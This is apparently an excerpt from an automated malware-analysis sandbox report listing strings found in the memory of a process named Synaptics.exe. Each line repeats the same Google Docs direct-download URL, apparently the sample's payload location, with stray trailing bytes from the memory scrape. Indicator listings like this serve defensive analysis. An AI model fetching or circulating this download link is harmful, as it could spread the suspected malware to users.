                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4eI
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3034953120.0000000019EFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4g
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4~
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5008=
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5HKFV
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download66?G-
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download69GET
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6?lF
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6N
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7J
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8:mb
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8gC
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9;zG%
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9a
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9f
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9w
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:73F
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:d1
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;5G
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;K
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;f
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=ISG
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?a
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-WoW
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB7KF&
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB;
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBa
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBitn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCKHE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCb
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD%
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD0
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD;
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD?
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDG
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDR
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDg
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDo
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDo-
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDxGD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE&
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE-;
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE1
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEM
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadESF
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEa
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEh
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEr
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEr0
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEs%
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF0OE
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG:
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHb
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHyCE
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIf
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ1CD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJg
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKa
